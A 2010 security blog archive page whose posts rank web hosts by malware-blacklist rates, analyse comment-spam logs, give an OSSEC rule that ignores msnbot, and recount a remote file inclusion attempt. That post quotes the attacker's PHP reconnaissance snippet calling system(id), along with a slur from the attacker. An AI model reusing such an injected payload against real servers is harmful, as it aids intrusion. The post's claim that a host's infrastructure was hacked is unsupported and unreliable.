security

Reviewing host companies – Which one is more secure?

Posted in bluehost, dreamhost, godaddy, netsol, review, security on September 2nd, 2010 by fseek – Be the first to comment

There are many hosting companies out there and many articles reviewing them. However, I am yet to see a review that includes security as their primary focus. What is the most secure (shared) hosting company out there? Which one should you use if you really care about security?

**Note that for this article, I am focusing on shared hosting, not dedicated or virtual servers.

Security is hard to measure, but we can choose a good metric to evaluate it: Google safe browsing. Google reports for each hosting company how many sites are blacklisted (for hosting malware, virus, phishing, etc) and we can tell a lot about the company by looking at it.

Companies evaluated: Godaddy, Network Solutions, Bluehost, DreamHost, Rackspace and Media Temple.

The winner: Network Solutions. Netsol had some serious security issues in the past, but it looks like they got their things right. Only 1% of their sites were blacklisted in the last 90 days, and only 0.04% distributed malware.

The loser(s): Media Temple and Rackspace. They really shocked me. 21% of the sites hosted at Rackspace and 18% of the sites hosted at (mt) got hacked and blacklisted in the last 90 days. That’s very bad news for their customers. It also means that somehow their infrastructure got hacked (even if they deny it). Hopefully they will get their things fixed soon, but right now, they are not recommended for anyone that cares about security.

Results:

#1- Network Solutions (most safe)
Blacklisted: 1.38%
Distributing malware: 0.04%

Of the 65257 site(s) we tested on this network over the past 90 days, 907 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

ref

#2 – GoDaddy (close second place)
Blacklisted: 2.06%
Distributing malware: 0.16%

Of the 591259 site(s) we tested on this network over the past 90 days, 12204 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

ref

#3 – DreamHost (technical tie for third)
Blacklisted: 3.26%
Distributing malware: 0.14%
ref

#3 – Bluehost (technical tie for third)
Blacklisted: 3.18%
Distributing malware: 0.29%

ref

#5 – Media Temple
Blacklisted: 18%
Distributing malware: 0.45%

Of the 64010 site(s) we tested on this network over the past 90 days, 11582 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

ref

#6 – Rackspace (shame medal)
Blacklisted: 21%

Of the 13121 site(s) we tested on this network over the past 90 days, 2770 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

That’s it. Any comments, or suggestions let us know. If you want us to add another hosting company, just mention them in the comments and we will see how they are doing in terms of security.

0sirys was here and also is a fucking gay

Posted in funny, security on April 20th, 2010 by fseek – Be the first to comment

Someone was trying an RFI (remote file inclusion) attack against my server today.

They were trying to inject the following file: http://[site].com/modules/id.txt into my site. I went to check it out and it looks like the file was hacked a few times.

In the top of it, someone added:

echo “Osirys”;
$un = @ php_uname();
$id1 = system(id);

A bit after, a funny haxor humor:

echo “0sirys was here and also is a fucking gay..“;
echo “uname -a: $un”

I laughed. You can read more about those RFI attacks here.

How a blog spam looks like in your logs

Posted in security, spam on April 19th, 2010 by fseek – Be the first to comment

Have you ever wondered what is the difference between a spammer and a real user? Well, your logs can show you.

I have not enabled any plugin to avoid spam on this blog and because of that I am being hammered with comment spams! Just as curiosity I went to see how a spammer looks like on my logs.

The first one that looked like legit was from:

spam comment

If you can’t see, it is from 222.124.x.x with a link to an youtube video on how to make money online. That’s how it looks in the logs:

222.124.x.x - - y "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/ HTTP/1.0" 200
18293 "http://www.youtube.com/watch?v=Q2kmL3eYxgQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"
222.124.x.x - - y "POST /wp-comments-post.php HTTP/1.0" 302 -
 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"

And do you know how a valid user looks like (when posting a comment):

174.16.a.b - - "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/ HTTP/1.1" 200 18293 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-content/themes/simplex/style.css HTTP/1.1" 200 18055 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-content/themes/simplex/includes/js/suckerfish.js HTTP/1.1" 200 400 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-content/themes/simplex/css/default.css HTTP/1.1" 200 4276 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
... more logs..
174.16.a.b - - "GET /wp-content/themes/simplex/images/rss.gif HTTP/1.1" 200 621 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "POST /wp-comments-post.php HTTP/1.1" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - -"GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/ HTTP/1.1" 200 19647 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"

Are you seeing a big difference here? They first have to download the CSS and all images that compose my template. Second, they have a valid referrer and third, after he posts a comment, he is redirected back to the post he was commenting at.

With the spammer, he just downloads the post itself (not the template, images, scripts, etc), post the comment (see POST /) and goes away. Doesn’t even redirect back to the page. His referrer is also the web site he is spamming for.

I checked a few other spams and they all look the same:

91.214.44.x - - [18/Apr/2010:19:40:24 +0000] "POST /wp-comments-post.php HTTP/1.0" 302 - "http://fseek.me/2010/03/how-to-convince-any-c-developer-to-dump-gcc-and-use-clang/" "Opera/7.11 (Windows NT 5.1; U) [en]"
91.214.44.x - - [18/Apr/2010:19:40:24 +0000] "GET /2010/03/how-to-convince-any-c-developer-to-dump-gcc-and-use-clang/comment-page-1/ HTTP/1.0" 200 41741 "http://fseek.me/2010/03/how-to-convince-any-c-developer-to-dump-gcc-and-use-clang/comment-page-1/#comment-513" "Opera/7.11 (Windows NT 5.1; U) [en]"

123.238.42.a - - [17/Apr/2010:19:04:41 +0000] "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/ HTTP/1.1" 200 22491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.238.42.b - - [17/Apr/2010:19:04:46 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Always the same behavior. It loads the page, and POST the comment, without even returning to the blog.

OSSEC rule to ignore the msn/bing bot

Posted in ossec, security on March 8th, 2010 by fseek – Be the first to comment

You know, the MSN (Bing/Live) crawler is a strange bot. It keeps trying to access inexistent files on my server, generating a bunch of 404’s.

OSSEC, being smart as it is, goes ahead and blocks them with its “Web-based file scanning’ alert. OSSEC is doing its part, but I don’t want to block MSN/BING (even though it likes to crawl invalid pages).

The solution? This simple rule:

<rule id="100308" level="0">
  <if_sid>31101</if_sid>
  <id>404</id>
  <description>Ignoring msn bot.</description>
  <srcip>65.55.0.0/16</srcip>
  <match> "msnbot</match>
</rule>

<rule id="100310" level="0">
  <if_sid>31101</if_sid>
  <id>404</id>
  <description>Ignoring msn bot.</description>
  <srcip>207.46.0.0/16</srcip>
  <match> "msnbot</match>
</rule>

No more alerts for it…